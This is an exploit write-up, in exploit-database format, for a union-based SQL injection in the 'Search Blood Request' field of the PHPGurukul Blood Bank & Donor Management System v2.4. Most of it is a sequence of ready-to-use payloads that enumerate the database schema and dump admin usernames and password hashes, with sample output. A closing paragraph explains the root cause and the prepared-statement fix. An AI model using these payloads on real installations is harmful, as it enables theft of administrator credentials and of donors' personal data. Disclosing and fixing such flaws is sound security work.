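# Exploit Title: Blood Bank & Donor Management System v2.4 - Union Based SQLi (Manual Exploit)
# Date: 2025-04-07
# Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
# Vendor: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
# Demo Site: http://localhost/BBDMS-Project-PHP-V2.4/bbdms
# Tested on: Kali Linux
# CVE: N/A

PoC:
1. Log in as admin.
2. Go to the "Search Blood Request" tab and enter one of the payloads below.

For version:
------------------------------------------------------------------
1' UNION SELECT 1,2,3,4,5,6,7,8,9,version()-- -
------------------------------------------------------------------

For databases:
------------------------------------------------------------------
1' UNION SELECT 1,2,3,4,5,6,7,8,9,schema_name FROM information_schema.schemata-- -
------------------------------------------------------------------

Tables in the database:
------------------------------------------------------------------
1' UNION SELECT 1,2,3,4,5,6,7,8,9,table_name FROM information_schema.tables WHERE table_schema='bbdms'-- -
------------------------------------------------------------------

Columns in the table:
------------------------------------------------------------------
1' UNION SELECT 1,2,3,4,5,6,7,8,9,column_name FROM information_schema.columns WHERE table_name='tbladmin'-- -
------------------------------------------------------------------

Dump data:
------------------------------------------------------------------
1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,concat(UserName,":",Password) FROM bbdms.tbladmin-- -
------------------------------------------------------------------

Result (column headers as rendered by the application):
S.No | Name of Donar | Conatact Number of Donar | Name of Requirer | Mobile Number of Requirer | Email of Requirer | Blood Require For | Message of Requirer | Apply Date
1 9 admin:f925916[REDACTED]251 2 4 3 5 6

Root cause and fix:
The payloads succeeding indicates that the search value is placed inside a quoted string in the SQL query without parameter binding: the single quote closes the string and the UNION SELECT is appended to the original 10-column result set. The request needs an authenticated admin session, but it returns schema metadata from information_schema and the stored UserName and Password values from tbladmin. The fix is to pass the search value as a bound parameter of a prepared statement (PDO or mysqli) instead of concatenating it into the query, and to run the application under a database account limited to the tables it needs. Until the code is patched, search requests to this page that contain UNION SELECT or information_schema are a useful indicator for request logging and WAF rules.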